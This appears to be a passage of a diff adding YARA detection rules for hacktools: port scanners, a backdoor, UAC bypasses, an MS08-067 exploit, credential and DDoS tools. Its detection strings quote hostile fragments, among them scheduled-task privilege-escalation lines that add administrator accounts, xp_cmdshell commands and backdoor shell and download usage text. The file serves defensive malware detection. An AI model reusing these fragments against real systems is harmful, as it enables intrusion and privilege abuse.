+ $s0 = "C:\\Program Files\\Microsoft Visual Studio\\VB98\\VB6.OLB"
+ $s1 = "dwGetAddressForObject"
+ $s2 = "Color Transfer Settings"
+ $s3 = "FX Global Lighting Angle"
+ $s4 = "Version compatibility info"
+ $s5 = "New Windows Thumbnail"
+ $s6 = "Layer ID Generator Base"
+ $s7 = "Color Halftone Settings"
+ $s8 = "C:\\WINDOWS\\SYSTEM\\MSWINSCK.oca"
+ condition:
+ all of them
+}
+
+rule _Bitchin_Threads_ {
+ meta:
+ description = "Auto-generated rule on file =Bitchin Threads=.exe"
+ author = "yarGen Yara Rule Generator by Florian Roth"
+ hash = "7491b138c1ee5a0d9d141fbfd1f0071b"
+ strings:
+ $s0 = "DarKPaiN"
+ $s1 = "=BITCHIN THREADS"
+ condition:
+ all of them
+}
+
+rule cgis4_cgis4 {
+ meta:
+ description = "Auto-generated rule on file cgis4.exe"
+ author = "yarGen Yara Rule Generator by Florian Roth"
+ hash = "d658dad1cd759d7f7d67da010e47ca23"
+ strings:
+ $s0 = ")PuMB_syJ"
+ $s1 = "&,fARW>yR"
+ $s2 = "m3hm3t_rullaz"
+ $s3 = "7Projectc1"
+ $s4 = "Ten-GGl\""
+ $s5 = "/Moziqlxa"
+ condition:
+ all of them
+}
+
+rule portscan {
+ meta:
+ description = "Auto-generated rule on file portscan.exe"
+ author = "yarGen Yara Rule Generator by Florian Roth"
+ hash = "a8bfdb2a925e89a281956b1e3bb32348"
+ strings:
+ $s5 = "0 :SCAN BEGUN ON PORT:"
+ $s6 = "0 :PORTSCAN READY."
+ condition:
+ all of them
+}
+
+rule ProPort_zip_Folder_ProPort {
+ meta:
+ description = "Auto-generated rule on file ProPort.exe"
+ author = "yarGen Yara Rule Generator by Florian Roth"
+ hash = "c1937a86939d4d12d10fc44b7ab9ab27"
+ strings:
+ $s0 = "Corrupt Data!"
+ $s1 = "K4p~omkIz"
+ $s2 = "DllTrojanScan"
+ $s3 = "GetDllInfo"
+ $s4 = "Compressed by Petite (c)1999 Ian Luck."
+ $s5 = "GetFileCRC32"
+ $s6 = "GetTrojanNumber"
+ $s7 = "TFAKAbout"
+ condition:
+ all of them
+}
+
+rule StealthWasp_s_Basic_PortScanner_v1_2 {
+ meta:
+ description = "Auto-generated rule on file StealthWasp's Basic PortScanner v1.2.exe"
+ author = "yarGen Yara Rule Generator by Florian Roth"
+ hash = "7c0f2cab134534cd35964fe4c6a1ff00"
+ strings:
+ $s1 = "Basic PortScanner"
+ $s6 = "Now scanning port:"
+ condition:
+ all of them
+}
+
+rule BluesPortScan {
+ meta:
+ description = "Auto-generated rule on file BluesPortScan.exe"
+ author = "yarGen Yara Rule Generator by Florian Roth"
+ hash = "6292f5fc737511f91af5e35643fc9eef"
+ strings:
+ $s0 = "This program was made by Volker Voss"
+ $s1 = "JiBOo~SSB"
+ condition:
+ all of them
+}
+
+rule scanarator_iis {
+ meta:
+ description = "Auto-generated rule on file iis.exe"
+ author = "yarGen Yara Rule Generator by Florian Roth"
+ hash = "3a8fc02c62c8dd65e038cc03e5451b6e"
+ strings:
+ $s0 = "example: iis 10.10.10.10"
+ $s1 = "send error"
+ condition:
+ all of them
+}
+
+rule stealth_Stealth {
+ meta:
+ description = "Auto-generated rule on file Stealth.exe"
+ author = "yarGen Yara Rule Generator by Florian Roth"
+ hash = "8ce3a386ce0eae10fc2ce0177bbc8ffa"
+ strings:
+ $s3 = "<table width=\"60%\" bgcolor=\"black\" cellspacing=\"0\" cellpadding=\"2\" border=\"1\" bordercolor=\"white\"><tr><td>"
+ $s6 = "This tool may be used only by system administrators. I am not responsible for "
+ condition:
+ all of them
+}
+
+rule Angry_IP_Scanner_v2_08_ipscan {
+ meta:
+ description = "Auto-generated rule on file ipscan.exe"
+ author = "yarGen Yara Rule Generator by Florian Roth"
+ hash = "70cf2c09776a29c3e837cb79d291514a"
+ strings:
+ $s0 = "_H/EnumDisplay/"
+ $s5 = "ECTED.MSVCRT0x"
+ $s8 = "NotSupported7"
+ condition:
+ all of them
+}
+
+rule crack_Loader {
+ meta:
+ description = "Auto-generated rule on file Loader.exe"
+ author = "yarGen Yara Rule Generator by Florian Roth"
+ hash = "f4f79358a6c600c1f0ba1f7e4879a16d"
+ strings:
+ $s0 = "NeoWait.exe"
+ $s1 = "RRRRRRRW"
+ condition:
+ all of them
+}
+
+rule CN_GUI_Scanner {
+ meta:
+ description = "Detects an unknown GUI scanner tool - CN background"
+ author = "Florian Roth"
+ hash = "3c67bbb1911cdaef5e675c56145e1112"
+ score = 65
+ date = "04.10.2014"
+ strings:
+ $s1 = "good.txt" fullword ascii
+ $s2 = "IP.txt" fullword ascii
+ $s3 = "xiaoyuer" fullword ascii
+ $s0w = "ssh(" fullword wide
+ $s1w = ").exe" fullword wide
+ condition:
+ all of them
+}
+
+rule CN_Packed_Scanner {
+ meta:
+ description = "Suspiciously packed executable"
+ author = "Florian Roth"
+ hash = "6323b51c116a77e3fba98f7bb7ff4ac6"
+ score = 40
+ date = "06.10.2014"
+ strings:
+ $s1 = "kernel32.dll" fullword ascii
+ $s2 = "CRTDLL.DLL" fullword ascii
+ $s3 = "__GetMainArgs" fullword ascii
+ $s4 = "WS2_32.DLL" fullword ascii
+ condition:
+ all of them and filesize < 180KB and filesize > 70KB
+}
+
+rule Tiny_Network_Tool_Generic {
+ meta:
+ description = "Tiny tool with suspicious function imports. (Rule based on WinEggDrop Scanner samples)"
+ author = "Florian Roth"
+ date = "08.10.2014"
+ score = 40
+ type = "file"
+ hash0 = "9e1ab25a937f39ed8b031cd8cfbc4c07"
+ hash1 = "cafc31d39c1e4721af3ba519759884b9"
+ hash2 = "8e635b9a1e5aa5ef84bfa619bd2a1f92"
+ strings:
+ $magic = { 4d 5a }
+
+ $s0 = "KERNEL32.DLL" fullword ascii
+ $s1 = "CRTDLL.DLL" fullword ascii
+ $s3 = "LoadLibraryA" fullword ascii
+ $s4 = "GetProcAddress" fullword ascii
+
+ $y1 = "WININET.DLL" fullword ascii
+ $y2 = "atoi" fullword ascii
+
+ $x1 = "ADVAPI32.DLL" fullword ascii
+ $x2 = "USER32.DLL" fullword ascii
+ $x3 = "wsock32.dll" fullword ascii
+ $x4 = "FreeSid" fullword ascii
+ $x5 = "atoi" fullword ascii
+
+ $z1 = "ADVAPI32.DLL" fullword ascii
+ $z2 = "USER32.DLL" fullword ascii
+ $z3 = "FreeSid" fullword ascii
+ $z4 = "ToAscii" fullword ascii
+
+ condition:
+ ( $magic at 0 ) and all of ($s*) and ( all of ($y*) or all of ($x*) or all of ($z*) ) and filesize < 15KB
+}
+
+rule Beastdoor_Backdoor {
+ meta:
+ description = "Detects the backdoor Beastdoor"
+ author = "Florian Roth"
+ score = 55
+ hash = "5ab10dda548cb821d7c15ebcd0a9f1ec6ef1a14abcc8ad4056944d060c49535a"
+ strings:
+ $s0 = "Redirect SPort RemoteHost RPort -->Port Redirector" fullword
+ $s1 = "POST /scripts/WWPMsg.dll HTTP/1.0" fullword
+ $s2 = "http://IP/a.exe a.exe -->Download A File" fullword
+ $s7 = "Host: wwp.mirabilis.com:80" fullword
+ $s8 = "%s -Set Port PortNumber -->Set The Service Port" fullword
+ $s11 = "Shell -->Get A Shell" fullword
+ $s14 = "DeleteService ServiceName -->Delete A Service" fullword
+ $s15 = "Getting The UserName(%c%s%c)-->ID(0x%s) Successfully" fullword
+ $s17 = "%s -Set ServiceName ServiceName -->Set The Service Name" fullword
+ condition:
+ 2 of them
+}
+
+rule Powershell_Netcat {
+ meta:
+ description = "Detects a Powershell version of the Netcat network hacking tool"
+ author = "Florian Roth"
+ score = 60
+ date = "10.10.2014"
+ strings:
+ $s0 = "[ValidateRange(1, 65535)]" fullword
+ $s1 = "$Client = New-Object -TypeName System.Net.Sockets.TcpClient" fullword
+ $s2 = "$Buffer = New-Object -TypeName System.Byte[] -ArgumentList $Client.ReceiveBufferSize" fullword
+ condition:
+ all of them
+}
+
+rule Chinese_Hacktool_1014 {
+ meta:
+ description = "Detects a chinese hacktool with unknown use"
+ author = "Florian Roth"
+ score = 60
+ date = "10.10.2014"
+ hash = "98c07a62f7f0842bcdbf941170f34990"
+ strings:
+ $s0 = "IEXT2_IDC_HORZLINEMOVECURSOR" fullword wide
+ $s1 = "msctls_progress32" fullword wide
+ $s2 = "Reply-To: %s" fullword ascii
+ $s3 = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" fullword ascii
+ $s4 = "html htm htx asp" fullword ascii
+ condition:
+ all of them
+}
+
+rule CN_Hacktool_BAT_PortsOpen {
+ meta:
+ description = "Detects a chinese BAT hacktool for local port evaluation"
+ author = "Florian Roth"
+ score = 60
+ date = "12.10.2014"
+ strings:
+ $s0 = "for /f \"skip=4 tokens=2,5\" %%a in ('netstat -ano -p TCP') do (" ascii
+ $s1 = "in ('tasklist /fi \"PID eq %%b\" /FO CSV') do " ascii
+ $s2 = "@echo off" ascii
+ condition:
+ all of them
+}
+
+rule CN_Hacktool_SSPort_Portscanner {
+ meta:
+ description = "Detects a chinese Portscanner named SSPort"
+ author = "Florian Roth"
+ score = 70
+ date = "12.10.2014"
+ strings:
+ $s0 = "Golden Fox" fullword wide
+ $s1 = "Syn Scan Port" fullword wide
+ $s2 = "CZ88.NET" fullword wide
+ condition:
+ all of them
+}
+
+rule CN_Hacktool_ScanPort_Portscanner {
+ meta:
+ description = "Detects a chinese Portscanner named ScanPort"
+ author = "Florian Roth"
+ score = 70
+ date = "12.10.2014"
+ strings:
+ $s0 = "LScanPort" fullword wide
+ $s1 = "LScanPort Microsoft" fullword wide
+ $s2 = "www.yupsoft.com" fullword wide
+ condition:
+ all of them
+}
+
+rule CN_Hacktool_S_EXE_Portscanner {
+ meta:
+ description = "Detects a chinese Portscanner named s.exe"
+ author = "Florian Roth"
+ score = 70
+ date = "12.10.2014"
+ strings:
+ $s0 = "\\Result.txt" fullword ascii
+ $s1 = "By:ZT QQ:376789051" fullword ascii
+ $s2 = "(http://www.eyuyan.com)" fullword wide
+ condition:
+ all of them
+}
+
+rule CN_Hacktool_MilkT_BAT {
+ meta:
+ description = "Detects a chinese Portscanner named MilkT - shipped BAT"
+ author = "Florian Roth"
+ score = 70
+ date = "12.10.2014"
+ strings:
+ $s0 = "for /f \"eol=P tokens=1 delims= \" %%i in (s1.txt) do echo %%i>>s2.txt" ascii
+ $s1 = "if not \"%Choice%\"==\"\" set Choice=%Choice:~0,1%" ascii
+ condition:
+ all of them
+}
+
+rule CN_Hacktool_MilkT_Scanner {
+ meta:
+ description = "Detects a chinese Portscanner named MilkT"
+ author = "Florian Roth"
+ score = 60
+ date = "12.10.2014"
+ strings:
+ $s0 = "Bf **************" ascii fullword
+ $s1 = "forming Time: %d/" ascii
+ $s2 = "KERNEL32.DLL" ascii fullword
+ $s3 = "CRTDLL.DLL" ascii fullword
+ $s4 = "WS2_32.DLL" ascii fullword
+ $s5 = "GetProcAddress" ascii fullword
+ $s6 = "atoi" ascii fullword
+ condition:
+ all of them
+}
+
+rule CN_Hacktool_1433_Scanner {
+ meta:
+ description = "Detects a chinese MSSQL scanner"
+ author = "Florian Roth"
+ score = 40
+ date = "12.10.2014"
+ strings:
+ $magic = { 4d 5a }
+ $s0 = "1433" wide fullword
+ $s1 = "1433V" wide
+ $s2 = "del Weak1.txt" ascii fullword
+ $s3 = "del Attack.txt" ascii fullword
+ $s4 = "del /s /Q C:\\Windows\\system32\\doors\\" fullword ascii
+ $s5 = "!&start iexplore http://www.crsky.com/soft/4818.html)" fullword ascii
+ condition:
+ ( $magic at 0 ) and all of ($s*)
+}
+
+rule CN_Hacktool_1433_Scanner_Comp2 {
+ meta:
+ description = "Detects a chinese MSSQL scanner - component 2"
+ author = "Florian Roth"
+ score = 40
+ date = "12.10.2014"
+ strings:
+ $magic = { 4d 5a }
+ $s0 = "1433" wide fullword
+ $s1 = "1433V" wide
+ $s2 = "UUUMUUUfUUUfUUUfUUUfUUUfUUUfUUUfUUUfUUUfUUUfUUUMUUU" ascii fullword
+ condition:
+ ( $magic at 0 ) and all of ($s*)
+}
+
+rule WCE_Modified_1_1014 {
+ meta:
+ description = "Modified (packed) version of Windows Credential Editor"
+ author = "Florian Roth"
+ hash = "09a412ac3c85cedce2642a19e99d8f903a2e0354"
+ score = 70
+ strings:
+ $s0 = "LSASS.EXE" fullword ascii
+ $s1 = "_CREDS" ascii
+ $s9 = "Using WCE " ascii
+ condition:
+ all of them
+}
+
+rule ReactOS_cmd_valid {
+ meta:
+ description = "ReactOS cmd.exe with correct file name - maybe packed with software or part of hacker toolset"
+ author = "Florian Roth"
+ date = "05.11.14"
+ reference = "http://www.elifulkerson.com/articles/suzy-sells-cmd-shells.php"
+ score = 30
+ hash = "b88f050fa69d85af3ff99af90a157435296cbb6e"
+ strings:
+ $s1 = "ReactOS Command Processor" fullword wide
+ $s2 = "Copyright (C) 1994-1998 Tim Norman and others" fullword wide
+ $s3 = "Eric Kohl and others" fullword wide
+ $s4 = "ReactOS Operating System" fullword wide
+ condition:
+ all of ($s*)
+}
+
+rule iKAT_wmi_rundll {
+ meta:
+ description = "This exe will attempt to use WMI to Call the Win32_Process event to spawn rundll - file wmi_rundll.exe"
+ author = "Florian Roth"
+ date = "05.11.14"
+ score = 65
+ reference = "http://ikat.ha.cked.net/Windows/functions/ikatfiles.html"
+ hash = "97c4d4e6a644eed5aa12437805e39213e494d120"
+ strings:
+ $s0 = "This operating system is not supported." fullword ascii
+ $s1 = "Error!" fullword ascii
+ $s2 = "Win32 only!" fullword ascii
+ $s3 = "COMCTL32.dll" fullword ascii
+ $s4 = "[LordPE]" ascii
+ $s5 = "CRTDLL.dll" fullword ascii
+ $s6 = "VBScript" fullword ascii
+ $s7 = "CoUninitialize" fullword ascii
+ condition:
+ all of them and filesize < 15KB
+}
+
+rule iKAT_revelations {
+ meta:
+ description = "iKAT hack tool showing the content of password fields - file revelations.exe"
+ author = "Florian Roth"
+ date = "05.11.14"
+ score = 75
+ reference = "http://ikat.ha.cked.net/Windows/functions/ikatfiles.html"
+ hash = "c4e217a8f2a2433297961561c5926cbd522f7996"
+ strings:
+ $s0 = "The RevelationHelper.DLL file is corrupt or missing." fullword ascii
+ $s8 = "BETAsupport@snadboy.com" fullword wide
+ $s9 = "support@snadboy.com" fullword wide
+ $s14 = "RevelationHelper.dll" fullword ascii
+ condition:
+ all of them
+}
+
+rule iKAT_priv_esc_tasksch {
+ meta:
+ description = "Task Schedulder Local Exploit - Windows local priv-esc using Task Scheduler, published by webDevil. Supports Windows 7 and Vista."
+ author = "Florian Roth"
+ date = "05.11.14"
+ score = 75
+ reference = "http://ikat.ha.cked.net/Windows/functions/ikatfiles.html"
+ hash = "84ab94bff7abf10ffe4446ff280f071f9702cf8b"
+ strings:
+ $s0 = "objShell.Run \"schtasks /change /TN wDw00t /disable\",,True" fullword ascii
+ $s3 = "objShell.Run \"schtasks /run /TN wDw00t\",,True" fullword ascii
+ $s4 = "'objShell.Run \"cmd /c copy C:\\windows\\system32\\tasks\\wDw00t .\",,True" fullword ascii
+ $s6 = "a.WriteLine (\"schtasks /delete /f /TN wDw00t\")" fullword ascii
+ $s7 = "a.WriteLine (\"net user /add ikat ikat\")" fullword ascii
+ $s8 = "a.WriteLine (\"cmd.exe\")" fullword ascii
+ $s9 = "strFileName=\"C:\\windows\\system32\\tasks\\wDw00t\"" fullword ascii
+ $s10 = "For n = 1 To (Len (hexXML) - 1) step 2" fullword ascii
+ $s13 = "output.writeline \" Should work on Vista/Win7/2008 x86/x64\"" fullword ascii
+ $s11 = "Set objExecObject = objShell.Exec(\"cmd /c schtasks /query /XML /TN wDw00t\")" fullword ascii
+ $s12 = "objShell.Run \"schtasks /create /TN wDw00t /sc monthly /tr \"\"\"+biatchFile+\"" ascii
+ $s14 = "a.WriteLine (\"net localgroup administrators /add v4l\")" fullword ascii
+ $s20 = "Set ts = fso.createtextfile (\"wDw00t.xml\")" fullword ascii
+ condition:
+ 2 of them
+}
+
+rule iKAT_command_lines_agent {
+ meta:
+ description = "iKAT hack tools set agent - file ikat.exe"
+ author = "Florian Roth"
+ date = "05.11.14"
+ score = 75
+ reference = "http://ikat.ha.cked.net/Windows/functions/ikatfiles.html"
+ hash = "c802ee1e49c0eae2a3fc22d2e82589d857f96d94"
+ strings:
+ $s0 = "Extended Module: super mario brothers" fullword ascii
+ $s1 = "Extended Module: " fullword ascii
+ $s3 = "ofpurenostalgicfeeling" fullword ascii
+ $s8 = "-supermariobrotheretic" fullword ascii
+ $s9 = "!http://132.147.96.202:80" fullword ascii
+ $s12 = "iKAT Exe Template" fullword ascii
+ $s15 = "withadancyflavour.." fullword ascii
+ $s16 = "FastTracker v2.00 " fullword ascii
+ condition:
+ 4 of them
+}
+
+rule iKAT_cmd_as_dll {
+ meta:
+ description = "iKAT toolset file cmd.dll ReactOS file cloaked"
+ author = "Florian Roth"
+ date = "05.11.14"
+ score = 65
+ reference = "http://ikat.ha.cked.net/Windows/functions/ikatfiles.html"
+ hash = "b5d0ba941efbc3b5c97fe70f70c14b2050b8336a"
+ strings:
+ $s1 = "cmd.exe" fullword wide
+ $s2 = "ReactOS Development Team" fullword wide
+ $s3 = "ReactOS Command Processor" fullword wide
+
+ $ext = "extension: .dll" nocase
+ condition:
+ all of ($s*) and $ext
+}
+
+rule iKAT_tools_nmap {
+ meta:
+ description = "Generic rule for NMAP - based on NMAP 4 standalone"
+ author = "Florian Roth"
+ date = "05.11.14"
+ score = 50
+ reference = "http://ikat.ha.cked.net/Windows/functions/ikatfiles.html"
+ hash = "d0543f365df61e6ebb5e345943577cc40fca8682"
+ strings:
+ $s0 = "Insecure.Org" fullword wide
+ $s1 = "Copyright (c) Insecure.Com" fullword wide
+ $s2 = "nmap" fullword nocase
+ $s3 = "Are you alert enough to be using Nmap? Have some coffee or Jolt(tm)." ascii
+ condition:
+ all of them
+}
+
+rule iKAT_startbar {
+ meta:
+ description = "Tool to hide unhide the windows startbar from command line - iKAT hack tools - file startbar.exe"
+ author = "Florian Roth"
+ date = "05.11.14"
+ score = 50
+ reference = "http://ikat.ha.cked.net/Windows/functions/ikatfiles.html"
+ hash = "0cac59b80b5427a8780168e1b85c540efffaf74f"
+ strings:
+ $s2 = "Shinysoft Limited1" fullword ascii
+ $s3 = "Shinysoft Limited0" fullword ascii
+ $s4 = "Wellington1" fullword ascii
+ $s6 = "Wainuiomata1" fullword ascii
+ $s8 = "56 Wright St1" fullword ascii
+ $s9 = "UTN-USERFirst-Object" fullword ascii
+ $s10 = "New Zealand1" fullword ascii
+ condition:
+ all of them
+}
+
+rule iKAT_gpdisable_customcmd_kitrap0d_uacpoc {
+ meta:
+ description = "iKAT hack tool set generic rule - from files gpdisable.exe, customcmd.exe, kitrap0d.exe, uacpoc.exe"
+ author = "Florian Roth"
+ date = "05.11.14"
+ reference = "http://ikat.ha.cked.net/Windows/functions/ikatfiles.html"
+ super_rule = 1
+ hash0 = "814c126f21bc5e993499f0c4e15b280bf7c1c77f"
+ hash1 = "2725690954c2ad61f5443eb9eec5bd16ab320014"
+ hash2 = "75f5aed1e719443a710b70f2004f34b2fe30f2a9"
+ hash3 = "b65a460d015fd94830d55e8eeaf6222321e12349"
+ score = 20
+ strings:
+ $s0 = "Failed to get temp file for source AES decryption" fullword
+ $s5 = "Failed to get encryption header for pwd-protect" fullword
+ $s17 = "Failed to get filetime" fullword
+ $s20 = "Failed to delete temp file for password decoding (3)" fullword
+ condition:
+ all of them
+}
+
+rule iKAT_Tool_Generic {
+ meta:
+ description = "Generic Rule for hack tool iKAT files gpdisable.exe, kitrap0d.exe, uacpoc.exe"
+ author = "Florian Roth"
+ date = "05.11.14"
+ score = 55
+ reference = "http://ikat.ha.cked.net/Windows/functions/ikatfiles.html"
+ super_rule = 1
+ hash0 = "814c126f21bc5e993499f0c4e15b280bf7c1c77f"
+ hash1 = "75f5aed1e719443a710b70f2004f34b2fe30f2a9"
+ hash2 = "b65a460d015fd94830d55e8eeaf6222321e12349"
+ strings:
+ $s0 = "<IconFile>C:\\WINDOWS\\App.ico</IconFile>" fullword
+ $s1 = "Failed to read the entire file" fullword
+ $s4 = "<VersionCreatedBy>14.4.0</VersionCreatedBy>" fullword
+ $s8 = "<ProgressCaption>Run "executor.bat" once the shell has spawned.</P"
+ $s9 = "Running Zip pipeline..." fullword
+ $s10 = "<FinTitle />" fullword
+ $s12 = "<AutoTemp>0</AutoTemp>" fullword
+ $s14 = "<DefaultDir>%TEMP%</DefaultDir>" fullword
+ $s15 = "AES Encrypting..." fullword
+ $s20 = "<UnzipDir>%TEMP%</UnzipDir>" fullword
+ condition:
+ all of them
+}
+
+rule BypassUac2 {
+ meta:
+ description = "Auto-generated rule - file BypassUac2.zip"
+ author = "yarGen Yara Rule Generator"
+ hash = "ef3e7dd2d1384ecec1a37254303959a43695df61"
+ strings:
+ $s0 = "/BypassUac/BypassUac/BypassUac_Utils.cpp" fullword ascii
+ $s1 = "/BypassUac/BypassUacDll/BypassUacDll.aps" fullword ascii
+ $s3 = "/BypassUac/BypassUac/BypassUac.ico" fullword ascii
+ condition:
+ all of them
+}
+
+rule BypassUac_3 {
+ meta:
+ description = "Auto-generated rule - file BypassUacDll.dll"
+ author = "yarGen Yara Rule Generator"
+ hash = "1974aacd0ed987119999735cad8413031115ce35"
+ strings:
+ $s0 = "BypassUacDLL.dll" fullword wide
+ $s1 = "\\Release\\BypassUacDll" ascii
+ $s3 = "Win7ElevateDLL" fullword wide
+ $s7 = "BypassUacDLL" fullword wide
+ condition:
+ 3 of them
+}
+
+rule BypassUac_9 {
+ meta:
+ description = "Auto-generated rule - file BypassUac.zip"
+ author = "yarGen Yara Rule Generator"
+ hash = "93c2375b2e4f75fc780553600fbdfd3cb344e69d"
+ strings:
+ $s0 = "/x86/BypassUac.exe" fullword ascii
+ $s1 = "/x64/BypassUac.exe" fullword ascii
+ $s2 = "/x86/BypassUacDll.dll" fullword ascii
+ $s3 = "/x64/BypassUacDll.dll" fullword ascii
+ $s15 = "BypassUac" fullword ascii
+ condition:
+ all of them
+}
+
+rule BypassUacDll_6 {
+ meta:
+ description = "Auto-generated rule - file BypassUacDll.aps"
+ author = "yarGen Yara Rule Generator"
+ hash = "58d7b24b6870cb7f1ec4807d2f77dd984077e531"
+ strings:
+ $s3 = "BypassUacDLL.dll" fullword wide
+ $s4 = "AFX_IDP_COMMAND_FAILURE" fullword ascii
+ condition:
+ all of them
+}
+
+rule BypassUacDll_7 {
+ meta:
+ description = "Auto-generated rule - file BypassUacDll.aps"
+ author = "yarGen Yara Rule Generator"
+ hash = "58d7b24b6870cb7f1ec4807d2f77dd984077e531"
+ strings:
+ $s3 = "BypassUacDLL.dll" fullword wide
+ $s4 = "AFX_IDP_COMMAND_FAILURE" fullword ascii
+ condition:
+ all of them
+}
+
+rule BypassUac_EXE {
+ meta:
+ description = "Auto-generated rule - file BypassUacDll.aps"
+ author = "yarGen Yara Rule Generator"
+ hash = "58d7b24b6870cb7f1ec4807d2f77dd984077e531"
+ strings:
+ $s1 = "Wole32.dll" wide
+ $s3 = "System32\\migwiz" wide
+ $s4 = "System32\\migwiz\\CRYPTBASE.dll" wide
+ $s5 = "Elevation:Administrator!new:" wide
+ $s6 = "BypassUac" wide
+ condition:
+ all of them
+}
+
+rule APT_Proxy_Malware_Packed_dev
+{
+ meta:
+ author = "FRoth"
+ date = "2014-11-10"
+ description = "APT Malware - Proxy"
+ hash = "6b6a86ceeab64a6cb273debfa82aec58"
+ score = 50
+ strings:
+ $string0 = "PECompact2" fullword
+ $string1 = "[LordPE]"
+ $string2 = "steam_ker.dll"
+ condition:
+ all of them
+}
+
+rule Tzddos_DDoS_Tool_CN {
+ meta:
+ description = "Disclosed hacktool set - file tzddos"
+ author = "Florian Roth"
+ date = "17.11.14"
+ score = 60
+ hash = "d4c517eda5458247edae59309453e0ae7d812f8e"
+ strings:
+ $s0 = "for /f %%a in (host.txt) do (" fullword ascii
+ $s1 = "for /f \"eol=S tokens=1 delims= \" %%i in (s2.txt) do echo %%i>>host.txt" fullword ascii
+ $s2 = "del host.txt /q" fullword ascii
+ $s3 = "for /f \"eol=- tokens=1 delims= \" %%i in (result.txt) do echo %%i>>s1.txt" fullword ascii
+ $s4 = "start Http.exe %%a %http%" fullword ascii
+ $s5 = "for /f \"eol=P tokens=1 delims= \" %%i in (s1.txt) do echo %%i>>s2.txt" fullword ascii
+ $s6 = "del Result.txt s2.txt s1.txt " fullword ascii
+ condition:
+ all of them
+}
+
+rule Ncat_Hacktools_CN {
+ meta:
+ description = "Disclosed hacktool set - file nc.exe"
+ author = "Florian Roth"
+ date = "17.11.14"
+ score = 60
+ hash = "001c0c01c96fa56216159f83f6f298755366e528"
+ strings:
+ $s0 = "nc -l -p port [options] [hostname] [port]" fullword ascii
+ $s2 = "nc [-options] hostname port[s] [ports] ... " fullword ascii
+ $s3 = "gethostpoop fuxored" fullword ascii
+ $s6 = "VERNOTSUPPORTED" fullword ascii
+ $s7 = "%s [%s] %d (%s)" fullword ascii
+ $s12 = " `--%s' doesn't allow an argument" fullword ascii
+ condition:
+ all of them
+}
+
+rule MS08_067_Exploit_Hacktools_CN {
+ meta:
+ description = "Disclosed hacktool set - file cs.exe"
+ author = "Florian Roth"
+ date = "17.11.14"
+ score = 60
+ hash = "a3e9e0655447494253a1a60dbc763d9661181322"
+ strings:
+ $s0 = "MS08-067 Exploit for CN by EMM@ph4nt0m.org" fullword ascii
+ $s3 = "Make SMB Connection error:%d" fullword ascii
+ $s5 = "Send Payload Over!" fullword ascii
+ $s7 = "Maybe Patched!" fullword ascii
+ $s8 = "RpcExceptionCode() = %u" fullword ascii
+ $s11 = "ph4nt0m" fullword wide
+ $s12 = "\\\\%s\\IPC$" fullword ascii
+ condition:
+ 4 of them
+}
+
+rule Hacktools_CN_Burst_sql {
+ meta:
+ description = "Disclosed hacktool set - file sql.exe"
+ author = "Florian Roth"
+ date = "17.11.14"
+ score = 60
+ hash = "d5139b865e99b7a276af7ae11b14096adb928245"
+ strings:
+ $s0 = "s.exe %s %s %s %s %d /save" fullword ascii
+ $s2 = "s.exe start error...%d" fullword ascii
+ $s4 = "EXEC sp_addextendedproc xp_cmdshell,'xplog70.dll'" fullword ascii
+ $s7 = "EXEC master..xp_cmdshell 'wscript.exe cc.js'" fullword ascii
+ $s10 = "Result.txt" fullword ascii
+ $s11 = "Usage:sql.exe [options]" fullword ascii
+ $s17 = "%s root %s %d error" fullword ascii
+ $s18 = "Pass.txt" fullword ascii
+ $s20 = "SELECT sillyr_at_gmail_dot_com INTO DUMPFILE '%s\\\\sillyr_x.so' FROM sillyr_x" fullword ascii
+ condition:
+ 6 of them
+}
+
+rule Hacktools_CN_JoHor_Rdos {
+ meta:
+ description = "Disclosed hacktool set - file spec.vbp"
+ author = "Florian Roth"
+ date = "17.11.14"
+ score = 60
+ hash = "400a90c9eabeb94ae05e5036e21dc922b0c1ffad"
+ strings:
+ $s3 = "service@dywt.com.cn" fullword ascii
+ $s9 = "www.dywt.com.cn" fullword ascii
+ $s17 = "This is a runtime library file for EPL applications. The EPL is a software devel" ascii
+ condition:
+ 2 of them
+}
+
+rule Hacktools_CN_Panda_445TOOL {
+ meta:
+ description = "Disclosed hacktool set - file 445TOOL.rar"
+ author = "Florian Roth"
+ date = "17.11.14"
+ score = 60
+ hash = "92050ba43029f914696289598cf3b18e34457a11"
+ strings:
+ $s0 = "scan.bat" fullword ascii
+ $s1 = "Http.exe" fullword ascii
+ $s2 = "GOGOGO.bat" fullword ascii
+ $s3 = "ip.txt" fullword ascii
+ condition:
+ all of them
+}
+
+rule Hacktools_CN_Panda_445 {
+ meta:
+ description = "Disclosed hacktool set - file 445.rar"
+ author = "Florian Roth"
+ date = "17.11.14"
+ score = 60
+ hash = "a61316578bcbde66f39d88e7fc113c134b5b966b"
+ strings:
+ $s0 = "for /f %%i in (ips.txt) do (start cmd.bat %%i)" fullword ascii
+ $s1 = "445\\nc.exe" fullword ascii
+ $s2 = "445\\s.exe" fullword ascii
+ $s3 = "cs.exe %1" fullword ascii
+ $s4 = "445\\cs.exe" fullword ascii
+ $s5 = "445\\ip.txt" fullword ascii
+ $s6 = "445\\cmd.bat" fullword ascii
+ $s9 = "@echo off" fullword ascii
+ condition:
+ all of them
+}
+
+rule Hacktools_CN_WinEggDrop {
+ meta:
+ description = "Disclosed hacktool set - file s.exe"
+ author = "Florian Roth"
+ date = "17.11.14"
+ score = 60
+ hash = "7665011742ce01f57e8dc0a85d35ec556035145d"
+ strings:
+ $s0 = "Normal Scan: About To Scan %u IP For %u Ports Using %d Thread" fullword ascii
+ $s2 = "SYN Scan: About To Scan %u IP For %u Ports Using %d Thread" fullword ascii
+ $s6 = "Example: %s TCP 12.12.12.12 12.12.12.254 21 512 /Banner" fullword ascii
+ $s8 = "Something Wrong About The Ports" fullword ascii
+ $s9 = "Performing Time: %d/%d/%d %d:%d:%d --> " fullword ascii
+ $s10 = "Example: %s TCP 12.12.12.12/24 80 512 /T8 /Save" fullword ascii
+ $s12 = "%u Ports Scanned.Taking %d Threads " fullword ascii
+ $s13 = "%-16s %-5d -> \"%s\"" fullword ascii
+ $s14 = "SYN Scan Can Only Perform On WIN 2K Or Above" fullword ascii
+ $s17 = "SYN Scan: About To Scan %s:%d Using %d Thread" fullword ascii
+ $s18 = "Scan %s Complete In %d Hours %d Minutes %d Seconds. Found %u Open Ports" fullword ascii
+ condition:
+ 5 of them
+}
+
+rule Hacktools_CN_Scan_BAT {
+ meta:
+ description = "Disclosed hacktool set - file scan.bat"
+ author = "Florian Roth"
+ date = "17.11.14"
+ score = 60
+ hash = "6517d7c245f1300e42f7354b0fe5d9666e5ce52a"
+ strings:
